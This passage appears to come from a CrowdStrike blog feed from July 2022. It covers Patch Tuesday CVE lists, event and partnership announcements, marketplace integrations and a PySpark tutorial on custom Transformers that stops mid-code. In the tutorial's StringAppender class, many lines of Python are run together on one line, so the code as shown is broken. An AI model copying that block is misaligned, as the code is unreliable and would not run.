Critical 8.1 CVE-2022-22029 Windows Network File System Remote Code Execution Vulnerability
Critical 7.5 CVE-2022-22039 Windows Network File System Remote Code Execution Vulnerability

Important Azure Site Recovery Service Vulnerabilities

Based on the total count of Azure vulnerabilities addressed this month, this set of CVEs should be prioritized. Azure Site Recovery is primarily a cloud-based service, but there are some on-premises components. An automatic update for these vulnerabilities is very unlikely to happen. Microsoft recommends upgrading to version 9.49 to remediate these vulnerabilities. Instructions can be found in this article. It’s incredibly unusual to see so many CVEs addressed in a single month for a single component.

Rank CVSS Score CVE
Important 8.3 CVE-2022-33674
Important 7.8 CVE-2022-33675
Important 7.2 CVE-2022-33677
Important 7.2 CVE-2022-33676
Important 7.2 CVE-2022-33678
Important 6.5 CVE-2022-30181
Important 6.5 CVE-2022-33641
Important 6.5 CVE-2022-33643
Important 6.5 CVE-2022-33655
Important 6.5 CVE-2022-33656
Important 6.5 CVE-2022-33657
Important 6.5 CVE-2022-33661
Important 6.5 CVE-2022-33662
Important 6.5 CVE-2022-33663
Important 6.5 CVE-2022-33665
Important 6.5 CVE-2022-33666
Important 6.5 CVE-2022-33667
Important 6.5 CVE-2022-33672
Important 6.5 CVE-2022-33673
Important 4.9 CVE-2022-33642
Important 4.9 CVE-2022-33650
Important 4.9 CVE-2022-33651
Important 4.9 CVE-2022-33653
Important 4.9 CVE-2022-33654
Important 4.9 CVE-2022-33659
Important 4.9 CVE-2022-33660
Important 4.9 CVE-2022-33664
Important 4.9 CVE-2022-33668
Important 4.9 CVE-2022-33669
Important 4.9 CVE-2022-33671
Important 4.4 CVE-2022-33652
Important 4.4 CVE-2022-33658

Falcon Spotlight provides the visibility SecOps teams need to quickly identify which vulnerabilities are prevalent in your organization’s environment. Since Falcon Spotlight is completely integrated within the CrowdStrike Falcon® platform, IT staff are able to take swift action by isolating potentially compromised hosts from exploited vulnerabilities. Additionally, the Falcon platform mitigates the risk from vulnerabilities that cannot be patched rapidly by detecting and automatically preventing exploitation attempts and post-exploitation activity.

Managing Vulnerabilities Is Ultimately about the Long Game

As evident in these monthly patch rollouts, no product is safe from vulnerabilities. Attackers will use any weakness to gain access, exploit flaws and move laterally to take advantage of your organization. While prioritization and patching are vital for immediately addressing critical issues, what makes a vulnerability management program successful is planning for the long term.

When your organization is planning for the long term, reviewing everything within your environment is important. Patching should not be done in a vacuum — it requires open communication with other parts of your cybersecurity organization and cross-collaboration with IT hygiene, threat intelligence and compliance teams to fully understand which areas of risk your organization might be exposed to and the types of threats or attackers are more likely to take advantage.

Organizations rely on full-suite platforms that offer comprehensive solutions to do this in a timely manner. Your staff should be able to make accurate and actionable recommendations based on any kind of suspicious activity surrounding the assets and entities in your environment while having access to relevant contextual data to provide the insight needed to make appropriate decisions to protect your environment. CrowdStrike stands resolutely behind this. When we say “We stop breaches,” we offer a holistic approach to creating a defensible security posture — and we do it in a way that is relevant, timely and accessible to all who are responsible for keeping your defenses strong. Beyond Falcon Spotlight, we suggest you try our Falcon platform to see how CrowdStrike can enable your team for success.

Learn More

This video on Falcon Spotlight™ vulnerability management shows how you can quickly monitor and prioritize vulnerabilities within the systems and applications in your organization.

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article.

Additional Resources

  • Learn more about vulnerabilities that can affect your environment at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21!  
  • See how Falcon Spotlight can help you discover and manage vulnerabilities in your environments. 
  • Read how CrowdStrike Asset Graph works in conjunction with Falcon Discover to offer you advanced insights on how suspicious activity is related to other assets within your environment. 
  • Learn how Falcon Identity Protection products can stop workforce identity threats faster. 
  • Download the CrowdStrike 2022 Global Threat Report to learn who and what is affecting your environment.
  • Make prioritization painless and efficient. Watch how Falcon Spotlight enables IT staff to improve visibility with custom filters and team dashboards.
  • Test CrowdStrike next-gen AV for yourself with a free trial of Falcon Prevent™.

CrowdStrike’s Adversary Universe World Tour: Coming to a City Near You!

19 July 2022 at 14:43

And we’re off! The CrowdStrike Adversary Universe® World Tour (AUWT) kicked off with a standing-room-only event in Brisbane, Australia on July 12, 2022, followed by another full house in Melbourne on July 18. We’re excited to begin this tour and share insights from CrowdStrike’s elite threat intelligence and security experts with customers around the world.

In the coming weeks and months, our experts will share secrets of the Adversary Universe to give attendees the insight required to defend against adversaries’ constantly evolving tradecraft. Attendees will gain a stronger understanding of the growing enterprise attack surface into the cloud, learn how CrowdStrike helps defend against threats to stop breaches, and hear from our customers about their own perspectives and experiences in fighting today’s threats.

Adversary Universe World Tour: Brisbane, Australia

A Deep Dive Into the Adversary Universe

The AUWT, presented in collaboration with AWS, will show attendees what they need to know to stop the adversaries targeting their organizations. Our experts will answer your most pressing questions: Who are these adversaries? What are their unique motivations? How are they breaking in? And — most importantly — how can they be stopped? 

An adversary-focused approach is essential to defend against the evolving techniques of today’s eCrime, nation state, and hacktivist groups. Organizations operating in different regions of the world sometimes face different threats — which is why we’re bringing this incredible knowledge to you! As we visit cities around the globe, attendees will learn about region-specific threats. Our experts will discuss which industries adversaries prioritize in your region, and the tactics they employ, to keep you a step ahead of these attacks.

We’ll also explore how adversaries seek to disrupt digital transformation by targeting cloud environments. As critical applications and data move to the cloud, adversaries are increasing their attacks and refining tradecraft to exploit vulnerabilities, steal credentials or host malware command-and-control — among other nefarious activities. Understanding these motivations and techniques is the foundation of an adversary-focused approach to security. 

But this critical intelligence is just part of what the AUWT is bringing to you!

Demonstrating the Critical Capabilities Required to Defeat Today’s Adversaries  

Combating today’s adversaries and stopping breaches requires an integrated approach that delivers strong Zero Trust protection across three critical layers: the device layer, the identity layer and the data layer. But this defense-in-depth approach has to work for your organization and users — not against you. Fighting the adversary cannot compromise your productivity.

CrowdStrike has set the bar by providing customers with the industry’s leading platform for unified threat prevention, detection, hunting, intelligence and remediation — all delivered through a single lightweight agent. At each stop on the tour, we’ll demonstrate how the CrowdStrike Falcon® platform is easy to deploy, easy to manage and highly effective at combating adversaries without interfering with users or productivity.

We’ll also unveil and dig deep into our latest innovations, designed to strengthen your security and keep you ahead of today’s threats. Here’s just a taste of some innovations we’ll showcase: 

  • Unified, agent-based and agentless cloud security: CrowdStrike’s cloud-native Falcon platform was built to give organizations comprehensive visibility, detection and remediation capabilities to secure their cloud infrastructure. On the AUWT, we’ll demonstrate why CrowdStrike is the only company to deliver an agent-based and agentless approach to cloud security that provides the flexibility needed to protect cloud environments.
  • Modern identity protection: Adversaries are increasingly using stolen credentials to bypass legacy defenses, masquerade as legitimate users and advance their attacks. Stopping the adversary requires the ability to stop identity-based attacks. Attendees will learn why identity and endpoint protection are better together — and how CrowdStrike is delivering these powerful capabilities through a unified platform approach.
  • Falcon XDR: Beyond the endpoint: The endpoint is the epicenter of enterprise risk and the modern battleground against today’s adversaries. But as attackers evolve their tactics, organizations need to extend detections beyond the endpoint to stop adversaries where they land. We’ll show you how CrowdStrike is extending the industry’s leading endpoint protection and supercharging detection and response across your security stack. We’ll show off major new innovations like the native automation capabilities of Falcon Fusion.

Most important of all, we’ll demonstrate how CrowdStrike continues to deliver the industry’s most powerful protection through an elegant, unified platform that eliminates friction and drives productivity. We’re also excited to show you how our elite team of experts use and manage this technology for customers struggling to fill their security skills gap. CrowdStrike stands alone in the combination of best-in-class technology and the world’s foremost experts in threat hunting and incident response.

CrowdStrike’s Adam Meyers gives a keynote at the AUWT stop in Melbourne, Australia

Upcoming AUWT Events

The AUWT will visit 70 cities around the world. Next up, we’ll continue the tour in Canberra, Australia before traveling to the United States, New Zealand, Malaysia, Singapore, Germany, France, England, Turkey, South Africa, Colombia, Brazil, Chile and several other global destinations in the coming months.

Interested in joining an AUWT event? Below are the cities next on our list, with more to be confirmed in the coming weeks. Hope to see you there!

  • July 20: Canberra, Australia
  • July 21: Charlotte, North Carolina, United States
  • July 22: Sydney, Australia
  • July 26: Tampa, Florida, United States
  • August 3: Auckland, New Zealand
  • August 10: Manila, Philippines
  • August 18: Kuala Lumpur, Malaysia
  • August 23: Nashville, Tennessee, United States
  • August 25: Singapore, Singapore
  • September 13: Istanbul, Turkey
  • September 14: Frankfurt, Germany
  • September 14: Jakarta, Indonesia
  • September 15: Johannesburg, South Africa
  • September 20: Vienna, Austria
  • September 22: Zurich, Switzerland

To find and register for an Adversary Universe World Tour event, you can visit the event website.

Johanna Flower is Interim Chief Marketing Officer at CrowdStrike.

Additional Resources

Think It, Build It, Secure It — CrowdStrike at AWS re:Inforce 2022

19 July 2022 at 17:39

For two days in July, Boston will be the epicenter of innovation in the world of cloud security — and we’re excited to see you there in person! As a proud sponsor of AWS re:Inforce 2022 (July 26-27), CrowdStrike is coming to town to meet with customers, partners and prospects to show how we’re protecting cloud environments against increasing adversary attacks. 

Adversary attacks on cloud environments have grown more aggressive and damaging. Adversaries view the cloud as a soft target, rife with vulnerabilities and misconfigurations to exploit. Stopping cloud breaches requires a comprehensive, platform approach to security that combines the power of agent-based and agentless protection that covers all workloads. 

We have a host of activities planned to help you better understand your cloud risk and how CrowdStrike’s adversary-focused approach to cloud security can keep you ahead of advancing attacks. We’ll be hosting speaking sessions, showing off new products, and providing one-on-one expert insight on the greatest risks your cloud environments face. Most importantly you’ll learn how to mitigate those risks with the CrowdStrike Falcon® platform.

We hope you’ll have a chance to stop by to visit us at Booth #203 to talk to our experts, see our demos, and even register to win one of our new limited-edition adversary figures! 

Visit CrowdStrike at Booth #203

The CrowdStrike experience will feature in-depth demos, theater presentations, partner highlights and cybersecurity experts on standby to discuss the latest insights into the threat landscape and how CrowdStrike is helping organizations around the world defend against attack. 

Featured Demo Stations

As organizations extend their infrastructure and move to the cloud, adversaries are finding security gaps. In the CrowdStrike 2022 Global Threat Report, our experts reported that organizations face malicious threats to cloud environments as cloud-based services are “increasingly abused by malicious actors … a trend that is likely to continue in the foreseeable future as more businesses seek hybrid work environments.”

At AWS re:Inforce 2022, we’ll show you how to stop cloud breaches through live-action demonstrations of the Falcon platform. CrowdStrike will curate demonstrations that allow you to experience how our cloud security products work in an actual AWS environment and with the AWS console. Our experts are ready to meet and discuss your biggest needs when it comes to cloud, including: 

  • How we integrate our container image scanning features with a DevOps pipeline
  • How a DevOps pipeline builds a container image and pushes it to an ECR registry
  • How a DevOps pipeline deploys an application to an EKS cluster using a container image from an ECR registry
  • How we deploy our container sensor to an EKS cluster to provide protection for vulnerable applications

The Partner Hour

CrowdStrike’s unique cybersecurity partner ecosystem helps simplify your security stack and protect your entire organization from modern adversaries with unified, trusted security solutions to solve real-world security and IT challenges. 

Join us at the Partner Hour hosted every day during AWS re:Inforce to learn how WE STOP BREACHES together with our partners.  

Featured partners will be: 

  • 10:00 a.m. — Netskope: Better Together to Continuously Enforce Zero Trust
  • 10:30 a.m. — ExtraHop: Empower XDR with Network Intelligence
  • 1:00 p.m. — Okta: Simplify Secure Remote Access
  • 1:30 p.m. — Zscaler: Endpoint to Application: Protected
  • 3:00 p.m. — Presidio/AWS: Mitigating Ransomware
  • 3:30 p.m. — Cloudflare: Enhancing and Expanding Zero Trust

Get Your Own Adversary Figure 

Scoring your own limited-edition CrowdStrike adversary figure is easy as 1-2-3. First, get a collectable adversary card when you complete each of the following steps:

  1. Listen to a theater presentation at the CrowdStrike booth 
  2. Engage in a product demo at one of our demo stations
  3. Snap a selfie and tag #GoCrowdStrike (we’ll have adversary masks in the booth for you to wear)

Then show your three adversary cards to a CrowdStrike representative in our booth, and you’ll be rewarded with your very own adversary figure while supplies last!

Meet 1:1 with a CrowdStrike Executive

CrowdStrike executives and leaders will be attending AWS re:Inforce 2022 in person. If you’re interested in a 1:1 onsite meeting, please complete this form

Attend the CrowdStrike Chalk Talk Session

As organizations have embraced the cloud revolution, so too have today’s adversaries. Defending the cloud requires securing a rapidly growing attack surface. IT and security teams must enforce continuous monitoring and security, from the development process to runtime. 

Join our Chalk Talk session where CrowdStrike and AWS experts will outline three steps to mitigate cloud security threats using an adversary-focused approach

  • Shift left and enrich CI/CD processes to detect threats and vulnerabilities before they reach production
  • Provide real-time protection across the control plane
  • Secure hosts and containers at runtime

Session: Three Steps to Mitigate Cloud Threats with CrowdStrike and AWS

When: July 26, 2:45-3:45 p.m. 

Where: Room 203

Speakers

  • Justin Harris, Staff Cloud Solution Architect, CrowdStrike
  • Sameer Vasanthapuram, Principal Product Manager, CrowdStrike
  • Patrick McDowell, Global Technical Lead, Security Partners, AWS

Join Us at the Cloud Security Mixer

Join CrowdStrike, Netskope, ExtraHop and Okta for refreshments and delicious food and to network with peers after Day 1 of AWS re:Inforce, just steps away from the Boston Convention Center.  

Register now — space is limited! 

When: Tuesday, July 26, 5:00-8:00 p.m. ET

Where: M.J. O’Connor’s, The Westin-Boston Floor 1, 425 Summer Street, Boston, MA 02210 

Learn More and Register Today

For more information about AWS re:Inforce 2022 and to register at attend, click here.

Additional Resources 

Address the Cybersecurity Skills Shortage by Building Your Security Stack with the CrowdStrike Store

By: Fiona Ing
26 July 2022 at 12:04

The increase in attack sophistication coupled with the decline of skilled security staff continues to put pressure on organizations and their teams by minimizing their ability to effectively see and control risks within the enterprise. This is only made more difficult as teams find themselves patching together disparate solutions, resulting in labyrinthian security stacks and a heavily siloed environment. To move beyond these challenges, organizations seek to employ innovative technology, processes and people that boost unification across their technology and teams, reducing visibility gaps and enabling a more effective security strategy. 

By implementing effective, interoperable IT and security solutions, organizations can benefit from shared data and layered security capabilities, without additional operation friction, for enhanced clarity and control around potential threats throughout their environment. The CrowdStrike Store is a one-stop-shop IT and cybersecurity software-as-a-service (SaaS) marketplace that allows you to easily discover and implement best-of-breed and interoperable solutions that address your unique use cases, unify your stack and simplify deployment. 

The CrowdStrike Store has recently added new partner applications and integrations, and a free partner plugin, to help seamlessly secure your device management, assets, identities and Internet of Things (IoT) environment. With the release of the JumpCloud application available for free trial and new technology integrations with Asimily, Beyond Identity and SafeBreach, you can ensure more holistic visibility for your team, faster time-to-value and a higher return on investment. 

The CrowdStrike Store team will cover these new integrations and guide you in selecting the right IT and security tools for truly empowering and securing your organization in our upcoming CrowdCast, Unifying Your Security Solutions: The Ultimate Guide to Selecting the Right Tools with the CrowdStrike Store. Join the session to learn about the essentials of building a modern IT and security stack with unified tools that accelerate your security team’s efficiency and efficacy.

Have OS Patching and Full Disk Encryption at Your Fingertips with JumpCloud

The increase of heavily distributed environments has made it difficult for organizations to secure their widespread remote workers and ensure they are operating on trusted, encrypted and up-to-date devices. With this complicated dispersed environment, teams lack visibility, making it hard for them to understand the status of device security and ensure coverage across multiple operating systems. To add to this, without holistic visibility and control of devices, meeting audit and compliance standards will likely become impossible.

JumpCloud, a CrowdStrike Falcon Fund partner, recently released a new application in the CrowdStrike Store that enables teams by providing OS patching and full disk encryption at their fingertips. With CrowdStrike and JumpCloud, users can easily leverage rich endpoint data and capabilities to control and secure dispersed devices. By centralizing device management through the JumpCloud Directory Platform, your team can easily implement enhanced security without friction. 

JumpCloud integrates with CrowdStrike Falcon Real Time Response (RTR) commands to help you automate OS patching from a single interface to keep every device up to date with customizable user notifications and device specific groups. JumpCloud also leverages CrowdStrike’s enriched endpoint telemetry to help provide additional environmental context, enabling secure devices with full disk encryption across your entire fleet. By easily tracking which devices were updated or encrypted, and any permission changes with out-of-the-box logging and reporting, you can ensure your organization is compliant. 

The JumpCloud agent can be simply deployed to Windows devices through the CrowdStrike Falcon® console, drastically cutting implementation time and helping you realize value faster.

Elevate Your Security with New Technology Integrations 

CrowdStrike has also expanded its ecosystem with new technology integrations built by Asimily, Beyond Identity and SafeBreach that leverage the Falcon platform to help unify your tools, get a higher return on your investments and enable a holistic security strategy. 

Asimily, a risk management platform for IoT devices and web-connected equipment, integrates by ingesting and querying CrowdStrike’s rich threat intelligence data to then correlate with its anomaly alerts and threat insights, providing you with layered visibility and additional threat context surrounding indicators of compromise (IOCs) across your environment. 

Beyond Identity integrates with the Falcon platform and leverages CrowdStrike’s Zero Trust Assessment (ZTA) score to help your team continuously monitor and enforce risk-based access policies using granular user and device signals. By checking the presence and state of the Falcon sensor and a device’s ZTA score, you can easily block access or quarantine a device during an authentication session for enhanced Zero Trust

Finally, SafeBreach’s breach and attack simulation solution integrates with the Falcon platform and Falcon X to provide automatically correlated simulated attacks and layered visibility into the performance of security controls to help harden your organizational posture. 

With these new additions to the CrowdStrike ecosystem, you can more easily integrate tools across your stack to remove operational friction and improve your security team’s visibility across distributed environments.

Build Your Modern Security Stack with the CrowdStrike Store

To effectively address evolving adversaries tactics, limited resources and a lack of visibility caused by siloed technology, organizations must empower their teams with the best unified tools to accelerate efficiency and efficacy at scale. To help you find the right tools that enable your business to more quickly realize value, the CrowdStrike Store provides easy access to a best-of-breed ecosystem of CrowdStrike products and partner integrations that minimize implementation complexity and empower the unification of IT and security stacks. By pairing CrowdStrike’s unified platform with partner solutions, you can eliminate blind spots and ensure that your organization has true end-to-end coverage of the entire threat landscape to stop breaches.

Learn more about how you can select the best tools to unify your stack and address your unique use cases by joining the CrowdStrike Store team’s CrowdCast on July 27. You’ll get key tips for choosing the right IT and security solutions to empower and secure your entire organization, and an inside look at new additions to the CrowdStrike ecosystem.

Additional Resources

CrowdStrike and AWS Expand Partnership to Offer Customers DevOps-Ready Security

26 July 2022 at 16:45

Cloud-based services are augmenting business operations and being adopted at a record pace. In fact, ​Gartner® estimates “more than 85% of organizations will embrace a cloud-first principle by 2025 and will not be able to fully execute on their digital strategies without the use of cloud-native architectures and technologies.”

As cloud adoption continues unabated, adversaries are becoming increasingly adept at finding security gaps to exploit cloud environments. According to the CrowdStrike 2022 Global Threat Report, cloud-based services are “increasingly abused by malicious actors in the course of computer network operations (CNO), a trend that is likely to continue in the foreseeable future as more businesses seek hybrid work environments.”

Defending cloud-based services requires securing a rapidly growing attack surface. DevOps and security teams must enforce continuous monitoring and protection from the development process to runtime to ensure DevOps-ready security. Agentless-only solutions only offer partial visibility and lack remediation capabilities. Securing the cloud requires an approach that combines agentless scanning with agent-driven protection, ensuring that DevOps and security teams are able to deploy the protection they need regardless of their environment. They need integrated protection and visibility to understand and stay ahead of modern adversaries.

CrowdStrike continues to extend our partnership with AWS to provide DevOps-ready security, and this week we’re making multiple key announcements to underscore our commitment: our Threat Detection and Remediation distinction in the AWS Security Competency; our role as a Launch Partner of AWS services; and our Service Ready designation.

AWS Security Competency Re-Launch

CrowdStrike is excited to announce today that it has achieved Threat Detection and Remediation distinction in the AWS Security Competency. This designation recognizes that CrowdStrike has successfully met AWS’s technical and quality requirements for providing customers with a deep level of protection and expertise in threat detection and remediation to help them achieve their cloud security goals.

Achieving the Threat Detection and Remediation distinction in the AWS Security Competency differentiates CrowdStrike as an AWS partner that provides specialized solutions designed to help companies — from startups and mid-sized businesses to the largest global enterprises — to adopt, develop and deploy security into their AWS environments, increasing their overall security posture on AWS. To receive the designation, partners must possess deep AWS expertise and deliver solutions seamlessly on AWS.

CrowdStrike Named a Launch Partner of AWS Services

Humio-powered Amazon GuardDuty Malware Protection: Amazon is launching Amazon GuardDuty Malware Protection for potentially compromised Amazon Elastic Compute Cloud (Amazon EC2) instances and containers running on Amazon EC2 (Amazon Elastic Kubernetes Service [Amazon EKS], Amazon ECS and customer-managed Kubernetes). Once Amazon GuardDuty Malware Protection enhancement is enabled and Amazon GuardDuty detects suspicious activity on a workload, it will initiate a malware scan on the associated Amazon EC2 instance. With the new Amazon GuardDuty Malware Protection, customers will have more context to detect malicious software as the source of suspicious behavior so they can take appropriate response actions. Amazon GuardDuty Malware Protection detects malware on Amazon Elastic Block Store (Amazon EBS)-backed Amazon EC2 instances and containers. If malware is detected during the scan, an additional finding will be generated by Amazon GuardDuty.

As a launch partner for Amazon GuardDuty Malware Protection, CrowdStrike provides customers with a specific Humio shipper for these Amazon GuardDuty logs to ingest all events identified, including the new types introduced with this release. This combination will include queries and dashboards for customers to contextually analyze, report and act based on the findings in Amazon GuardDuty. Customers will now have greater extensibility to use the breadth of services at AWS to simplify routing of logs to Humio, enabling accelerated threat hunting and search across their AWS footprint for novel and advanced cyber threats. As a launch partner, CrowdStrike provides customers with:

  • A defense-in-depth approach to protect instances that may not be protected or address blind spots where CrowdStrike Falcon® agents aren’t deployed
  • Context enrichment from other applications and platform logs
  • Automated remediation such as getting notified of Humio’s built-in actions or isolating an Amazon EC2 instance for incident response with a webhook

Figure 1. Amazon GuardDuty dashboard in the CrowdStrike Humio console

AWS Service Ready Achievements

The AWS Service Ready Program is designed to validate software products that are built by AWS partners and work with specific AWS services. These software products are technically validated by AWS Partner Solution Architects for their sound architecture and adherence to AWS best practices, and for their market adoption including customer successes. CrowdStrike has completed all of the requirements for two Service Ready Programs:

AWS Graviton Ready: AWS Graviton processors are designed to deliver the best price performance for cloud workloads running in Amazon EC2. As an AWS Graviton Ready Partner, CrowdStrike provides:

  • Industry-leading protection across AWS Graviton-powered workloads through machine learning and artificial intelligence
  • Unparalleled visibility and alert context across compute services powered by Graviton processors, including Amazon EC2
  • Unified security across endpoints, cloud workloads and identity

AWS PrivateLink Service Ready: AWS PrivateLink provides private connectivity between VPCs, AWS services, and your on-premises networks, without exposing your traffic to the public internet. AWS PrivateLink makes it easy to connect services across different accounts and VPCs to significantly simplify your network architecture. CrowdStrike is now an AWS PrivateLink Ready Partner, and the integration enables customers sensor-to-cloud traffic to flow via AWS PrivateLink, reducing internet exposure and simplifying network architectures. 

The Powerful Benefits of CrowdStrike and AWS

Our joint solutions and integrations in various AWS services are powered by the CrowdStrike Security Cloud and the CrowdStrike Falcon platform, which leverage real-time indicators of attack, threat intelligence, evolving adversary tradecraft and enriched telemetry from across the enterprise to deliver hyper-accurate detections, automated protection and remediation, elite threat hunting and prioritized observability of vulnerabilities. Customers benefit from better protection, better performance and immediate time-to-value. With over a dozen service-level integrations available, joint AWS and CrowdStrike customers are provided with a consistent security posture between their on-premises workloads and those running in the AWS cloud for DevOps-ready security.

  • Unified hybrid security experience: CrowdStrike supports secure deployment and management of AWS Graviton processors, and workloads across Amazon EKS, AWS Fargate, and Amazon EKS Anywhere. With a single lightweight agent and single management console, customers can experience a unified, end-to-end experience from the host to the cloud. No matter where compute workloads are located, customers benefit from visibility, compliance and threat detection and response to outsmart the adversary.
  • A modern and consistent security approach: The latest integrations, support and Service Ready achievements from CrowdStrike for AWS allow organizations to implement a modern enterprise security approach where protection is provided across your AWS infrastructure to defend against sophisticated threat activity.

Try a 15-day trial to see how the CrowdStrike Falcon platform’s superior cyberattack prevention, malicious activity detection and immediate response capabilities can be fully deployed in minutes to protect your business.

Endnotes

  1. Gartner, “Gartner Says Cloud Will Be the Centerpiece of New Digital Experiences,” November 10, 2021.

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and is used herein with permission. All rights reserved.

Additional Resources

A Deep Dive into Custom Spark Transformers for Machine Learning Pipelines

By: Jay Luan
27 July 2022 at 15:34
  • Modern Spark Pipelines are a powerful way to create machine learning pipelines
  • Spark Pipelines use off-the-shelf data transformers to reduce boilerplate code and improve readability for specific use cases
  • This blog outlines how to construct custom Spark Transformers to integrate with Spark Pipelines
  • Learn how to identify the components of each Transformer class member function and correctly serialize and deserialize the transformer to and from disk 

CrowdStrike data scientists often explore novel approaches for creating machine learning pipelines especially when processing a large volume of data. The CrowdStrike Security Cloud stores more than 15 petabytes of data in the cloud and gathers data from trillions of security events per day, using it to secure millions of endpoints, cloud workloads and containers around the globe with the power of machine learning and indicators of attack.

When processing so much data, making use of modern Spark Pipelines is a powerful way to use off-the-shelf libraries to reduce boilerplate code and improve readability. Because these Transformers may not fit all use cases, it’s important to understand how to currently construct a custom Spark Transformer that integrates with Spark Pipelines and understand the components of Transformer. 

Pipeline Framework

Note: For this blog, we assume usage of PySpark version 3.0+

Machine learning workflows generally consist of multiple high-level steps:

  • Preprocessing your input data via some extract, transform and load (ETL) steps
  • Splitting the dataset for either cross validation or train/test/validate split
  • Training the model
  • Tuning hyperparameters

The code and structure of each step vary greatly and if inconsistently implemented, can affect readability and flexibility of a data scientist’s workflow. In addition, data scientists often reuse components of their workflow with slight modifications in repeated experiments. This is why commonly used frameworks like scikit-learn and Spark have created pipeline frameworks to more flexibly express and assemble common high-level workflows. 

Such frameworks give the user a consistent approach to build out the steps required to conduct experiments and are easy to extend. A less obvious advantage of this frame is the reduction of complexity for collaborators. Pipelines provide a common code structure which is more readable and thus reduces the barrier of entry into your codebase.

The following is a simple example of a dataset using a pipeline:

# Setup a simple pipeline to tokenize -> hashed term frequency vector -> train logistic regression
tokenizer = Tokenizer(inputCol="text", outputCol="words")
hashingTF = HashingTF(inputCol=tokenizer.getOutputCol(), outputCol="features")
lr = LogisticRegression(maxIter=10, regParam=0.001)
pipeline = Pipeline(stages=[tokenizer,
                            hashingTF,
                            lr])
 
model = pipeline.fit(input_dataset)

Because experiments should be reproducible, we may need to save information regarding the state of transformation and model hyperparameters. Without a pipeline, each transformer and model may need to be saved separately, and the order of transformation must be manually preserved. Using Spark Pipeline allows us to save the entire pipeline (including transformer states, order and hyperparameters) as a single object and reload easily. From an experimentation and engineering perspective, this reduces the ambiguity of experiment configurations and makes integrating the model and pipeline downstream more straightforward.

# save and reload the entire pipeline
model.save(save_path)
 
# use pipeline to run entire process again
loaded_pipeline = Pipeline.load(save_path)
loaded_predictions = loaded_pipeline.transform(test) 
 
# output
``` 
>> loaded_pipeline.stages
# output shows the stages in the loaded pipeline
[Tokenizer_7397a14f7aaa,
 HashingTF_4c188d1e40c1,
 LogisticRegressionModel: uid=LogisticRegression_a3ac1d359fb0, numClasses=2, numFeatures=12]
```

Custom Data Transformations

With improvements in flexibility and readability comes some additional work. We must conform our code with a structure that’s acceptable by modern pipelines. One very common set of tasks used in pipelines is the transform step of the ETL process, where we must take our raw data and pass it through a series of data transformation steps. The output of these transforms are vectors and labels used for model training. Though many manipulations on Spark Data can already be done through either native functions or Spark SQL, there are often custom transforms we must apply to every row of our data that require custom code. 

Let’s take for example a simple text manipulation Spark Dataset containing id, text and label  columns:

df = spark_session.createDataFrame([
    (0, "a b c d e spark", 1.0),
    (1, "b d", 0.0),
    (2, "spark f g h", 1.0),
    (3, "hadoop mapreduce", 0.0)
], ["id", "text", "label"])
 
# Produces the following table:
```
+---+----------------+-----+
| id|            text|label|
+---+----------------+-----+
|  0| a b c d e spark|  1.0|
|  1|             b d|  0.0|
|  2|     spark f g h|  1.0|
|  3|hadoop mapreduce|  0.0|
+---+----------------+-----+
```

Starting with a Basic Transformation

It is recommended that data transformation should be expressed as Spark SQL when possible due to its under-the-hood integration with Spark query optimizers and JVM. However, this is sometimes not possible with more complex transformations. In such cases, we can use Spark User Defined Function (UDF) to write our transformations. (Note that UDFs will always be slower than native Spark SQL.)

We’d like to apply a transform such that if we see the string spark, we will append an additional signal string to the end of the text. A simple way to apply this transform to each row is to write this function, then run it as a UDF:

from pyspark.sql.functions import udf
from pyspark.sql.types import StringType
 
# Define our transformation
def append_string(s, append_val=""):
    """
    If we see the word `spark` in s, append a string to the current string.
    """
    if s and 'spark' in s:
        return s + append_val
    return s
 
 
# Wrap the transformation as a UDF
append_udf = udf(lambda row: append_string(row, " hadoop"), StringType())
 
# Apply the UDF to our Dataset and create a resultant column called `appended_text`
df.withColumn("appended_text", append_udf(col("text"))) \
  .show()   
 
 
# Produces the following output table:
```
+---+----------------+-----+----------------------+
|id |text        	|label|appended_text     	|
+---+----------------+-----+----------------------+
|0  |a b c d e spark |1.0  |a b c d e spark hadoop|
|1  |b d         	|0.0  |b d               	|
|2  |spark f g h 	|1.0  |spark f g h hadoop	|
|3  |hadoop mapreduce|0.0  |hadoop mapreduce  	|
+---+----------------+-----+----------------------+
 
```

Note that although this will apply the correct transform, there are a few inconveniences:

  • We cannot save the internal state of the transform — for example, what value we used for the append_val argument in append_string(). This is especially important if we have many inputs that need to be set before we run our transform.
  • We cannot use it as part of a Pipeline, so we would need to either create a Pipeline which starts after this transform step, or write our own subsequent data transforms manually. This means we need to programmatically ensure that code between experiments stays the same. 

Converting Transformation Function Into a Custom Transformer

To make our transformation function both savable and loadable and usable as part of a Pipeline, we will inherit from the SparkML Transformer class along with a few mixins to ensure API conformity with SparkML. The converted custom transformer would look like the following:

import append_string  # this is the function we wrote above
from pyspark.sql.functions import udf
from pyspark.sql.types import StringType
from pyspark import keyword_only  # Note: use pyspark.ml.util.keyword_only if Spark < 2.0 from pyspark.ml import Transformer from pyspark.ml.param.shared import HasInputCol, HasOutputCol, Param, Params, TypeConverters from pyspark.ml.util import DefaultParamsReadable, DefaultParamsWritable class StringAppender(Transformer, # Base class HasInputCol, # Sets up an inputCol parameter HasOutputCol, # Sets up an outputCol parameter DefaultParamsReadable, # Makes parameters readable from file DefaultParamsWritable # Makes parameters writable from file ): """ Custom Transformer wrapper class for append_string() """ # append_str is a value which we would like to be able to store state for, so we create a parameter. append_str = Param( Params._dummy(), "append_str", "Value we want to append with", typeConverter=TypeConverters.toString, # This will allow code to automatically try to convert to string ) @keyword_only def __init__(self, inputCol=None, outputCol=None, append_str=None): """ Constructor: set values for all Param objects """ super().__init__() self._setDefault(append_str=None) kwargs = self._input_kwargs self.setParams(**kwargs) @keyword_only def setParams(self, inputCol=None, outputCol=None, append_str=None): kwargs = self._input_kwargs return self._set(**kwargs) def setAppendStr(self, new_append_str): return self.setParams(append_str=new_append_str) # Required if you use Spark >= 3.0
    def setInputCol(self, new_inputCol):
        return self.setParams(inputCol=new_inputCol)
  
    # Required if you use Spark >= 3.0
    def setOutputCol(self, new_outputCol):
        return self.setParams(outputCol=new_outputCol)
  
    def getAppendStr(self):
